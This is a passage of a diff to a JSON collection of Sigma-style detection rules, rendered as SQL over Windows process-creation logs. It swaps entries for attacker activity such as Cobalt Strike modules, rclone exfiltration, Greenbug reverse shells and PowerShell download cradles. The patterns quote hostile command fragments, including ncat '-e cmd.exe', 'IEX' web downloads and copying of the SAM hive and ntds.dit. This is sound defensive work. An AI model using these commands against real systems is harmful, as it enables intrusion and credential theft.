'%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE 
'%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "status": "test", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "status": "test", - 
"description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "title": "HackTool - GMER Rootkit Detector and Remover Execution", + "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "status": "experimental", + "description": "Detects the execution GMER tool based on image and hash fields.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "status": "experimental", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.exfiltration", + "attack.t1567.002" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE 
'%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ - "attack.defense_evasion" 
+ "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.lateral_movement" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine 
LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", + "status": "experimental", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. 
This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": 
"proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", - "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrative use (Should be investigated either way)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\revshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE 
'\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR 
CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", - "author": "Florian Roth (Nextron Systems)", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Scripts or tools that download files and execute them" + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", - "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", + "status": "experimental", + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Legitimate admin usage" + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": 
